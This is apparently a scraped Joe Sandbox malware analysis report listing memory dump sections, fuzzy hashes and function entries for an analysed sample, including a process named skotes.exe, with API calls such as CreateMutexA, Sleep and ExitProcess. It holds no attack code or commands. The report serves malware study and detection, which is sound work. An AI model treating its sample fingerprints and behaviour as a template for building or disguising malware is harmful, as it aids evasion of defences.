Associated: 00000000.00000002.1351668555.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351692992.00000000004DA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351710042.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351710042.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351759162.0000000000534000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351778581.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351807859.0000000000536000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351830154.000000000053A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351847947.000000000053D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351866645.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351884527.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 2370da0177e6d79f8af496d00628a38997a6e5d9d5b7f2aeb34aa1a8d9af8d0a
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 0F115E7F22314B47E604AE2DC8B46B7A395EBC53217EC4375C0418BBC4DA22E4719700

Function 0027A302 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1350828872.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350854966.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350944262.00000000002A9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350964620.00000000002AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350983718.00000000002B5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351021597.00000000002B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351044027.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351161829.000000000040F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351182850.0000000000412000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351208390.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351208390.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351255484.0000000000435000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351269485.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351286372.0000000000442000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351304627.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351323793.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351339302.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351353457.0000000000466000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351377245.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351406927.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351433599.0000000000491000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351459139.0000000000492000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351477745.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351494555.0000000000497000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351517076.000000000049B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351542482.00000000004AA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351561593.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351583475.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351600385.00000000004BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351616529.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351635171.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351652841.00000000004C3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351668555.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351692992.00000000004DA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351710042.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351710042.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351759162.0000000000534000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351778581.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351807859.0000000000536000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351830154.000000000053A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351847947.000000000053D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351866645.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351884527.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: 15fb46affe32bfff3819b08f8213a255f875d08d84e3710ea452087169efd00e
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: 38E08C32922268EBCB15EF98C90498EF3ECEB89B10B658096F905D3191C270DE00CBD0

Function 00242EC0 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00242F5F
__Mtx_unlock.LIBCPMT ref: 00242FCC
__Cnd_broadcast.LIBCPMT ref: 00242FE3
__Mtx_unlock.LIBCPMT ref: 002430F5
__Mtx_unlock.LIBCPMT ref: 0024319B

Memory Dump Source

Source File: 00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1350828872.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350854966.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350944262.00000000002A9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350964620.00000000002AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350983718.00000000002B5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351021597.00000000002B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351044027.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351161829.000000000040F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351182850.0000000000412000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351208390.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351208390.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351255484.0000000000435000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351269485.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351286372.0000000000442000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351304627.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351323793.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351339302.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351353457.0000000000466000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351377245.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351406927.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351433599.0000000000491000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351459139.0000000000492000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351477745.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351494555.0000000000497000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351517076.000000000049B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351542482.00000000004AA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351561593.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351583475.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351600385.00000000004BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351616529.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351635171.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351652841.00000000004C3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351668555.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351692992.00000000004DA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351710042.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351710042.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351759162.0000000000534000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351778581.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351807859.0000000000536000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351830154.000000000053A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351847947.000000000053D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351866645.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351884527.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_file.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: 3406e226b6419289ee19be85dc805a639ffef8e250f317de36ae8167642baccb
Instruction ID: d6096af36d217c095f84a2901326259228029dfc05fa569c002e4d17fe1e099b
Opcode Fuzzy Hash: 3406e226b6419289ee19be85dc805a639ffef8e250f317de36ae8167642baccb
Instruction Fuzzy Hash: 44A1D170A21306DFDB29EF65C84576AB7B8FF15311F144229E819D7281FB31EA28CB91

Function 0025BB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0025BBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 0025BBE4
_xtime_get.LIBCPMT ref: 0025BC07
__Xtime_diff_to_millis2.LIBCPMT ref: 0025BC13

Memory Dump Source

Source File: 00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1350828872.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350854966.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350944262.00000000002A9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350964620.00000000002AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350983718.00000000002B5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351021597.00000000002B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351044027.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351161829.000000000040F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351182850.0000000000412000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351208390.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351208390.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351255484.0000000000435000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351269485.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351286372.0000000000442000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351304627.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351323793.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351339302.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351353457.0000000000466000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351377245.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351406927.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351433599.0000000000491000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351459139.0000000000492000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351477745.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351494555.0000000000497000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351517076.000000000049B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351542482.00000000004AA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351561593.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351583475.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351600385.00000000004BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351616529.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351635171.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351652841.00000000004C3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351668555.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351692992.00000000004DA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351710042.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351710042.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351759162.0000000000534000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351778581.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351807859.0000000000536000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351830154.000000000053A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351847947.000000000053D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351866645.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1351884527.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_file.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 6e924dcf9752980fd1dbecbde07537fc4a0fcc969c19cc7061247d5e86f59009
Instruction ID: bc5510174a61a4d64686cbb32f63f732afc7a411bc24f4923fb6c9fe0ab5bd43
Opcode Fuzzy Hash: 6e924dcf9752980fd1dbecbde07537fc4a0fcc969c19cc7061247d5e86f59009
Instruction Fuzzy Hash: AA215C71E10219AFDF00EFA4DC859BEB7B9EF48711F100016F901A7250DB709D158BA4

Analysis Process: skotes.exePID: 8056, Parent PID: 7812COMMON

Execution Graph

Execution Coverage:	0.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	614
Total number of Limit Nodes:	4

Executed Functions

Function 00FE652B Relevance: 1.5, APIs: 1, Instructions: 24
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,00FE652A,?,?,?,?,?,00FE7661), ref: 00FE6566

Memory Dump Source

Source File: 00000002.00000002.1385140605.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000002.00000002.1385125003.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385140605.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385194038.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385212908.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385229065.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385242583.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385257016.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385346627.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385362772.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385379192.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385379192.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385409001.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385423544.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385441710.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385457737.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385475492.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385493764.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385511986.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385528459.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385549136.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385564912.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385579394.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385597548.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385612866.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385630220.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385649820.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385667176.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385685019.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385703498.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385717855.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385733345.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385748036.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385765595.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385783876.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385799848.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385799848.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385919410.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385960284.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386020740.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386058636.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386092620.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386139476.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386153484.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: dc44ea5107d0f5be1b68af202479753b839599ea590289e1c536691116678947
Instruction ID: 8b81e0e8258ab9ac2ea5e5c2953c6876973cc9361d817f15d2a50789cd96e0d1
Opcode Fuzzy Hash: dc44ea5107d0f5be1b68af202479753b839599ea590289e1c536691116678947
Instruction Fuzzy Hash: 33E0863124128CAEDE357B1ACD1D98C3B19EB51790F044415F9088A121CB39ED51E980

Function 00FB9BA5 Relevance: 3.1, APIs: 2, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00FBA963
CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981

Memory Dump Source

Source File: 00000002.00000002.1385140605.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000002.00000002.1385125003.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385140605.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385194038.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385212908.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385229065.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385242583.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385257016.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385346627.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385362772.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385379192.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385379192.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385409001.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385423544.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385441710.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385457737.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385475492.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385493764.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385511986.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385528459.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385549136.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385564912.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385579394.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385597548.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385612866.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385630220.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385649820.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385667176.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385685019.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385703498.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385717855.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385733345.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385748036.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385765595.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385783876.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385799848.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385799848.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385919410.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385960284.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386020740.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386058636.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386092620.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386139476.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1386153484.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 5e73b1b6ce078c3042821523f24fc12ccb8f15e5c609ec8fb25f830803b7638f
Instruction ID: 8093fecfe3ff3e4ccb5aacd5a6b603ac77f6c31726eb862e3c88259ad352210a
Opcode Fuzzy Hash: 5e73b1b6ce078c3042821523f24fc12ccb8f15e5c609ec8fb25f830803b7638f
Instruction Fuzzy Hash: 08314C71B042059BEB189B7ADD89BEDBB62EBC1320F20821DE418972D5C7798981EB51

Function 00FB9F44 Relevance: 3.1, APIs: 2, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00FBA963
CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981

Memory Dump Source

Source File: 00000002.00000002.1385140605.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000002.00000002.1385125003.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385140605.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385194038.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385212908.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385229065.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385242583.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385257016.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1385346627.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
